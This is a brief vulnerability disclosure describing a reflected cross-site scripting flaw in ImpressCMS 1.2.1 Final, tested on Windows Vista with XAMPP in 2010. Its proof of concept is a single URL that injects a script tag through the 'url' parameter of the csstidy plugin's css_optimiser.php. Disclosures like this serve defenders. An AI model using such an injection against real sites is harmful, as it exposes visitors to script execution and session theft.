Search
Software Vulnerability Tested On Date
ImpressCMS 1.2.1 Final Reflected Cross-site Scripting Windows Vista + XAMPP 7/6/2010
Description
A vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E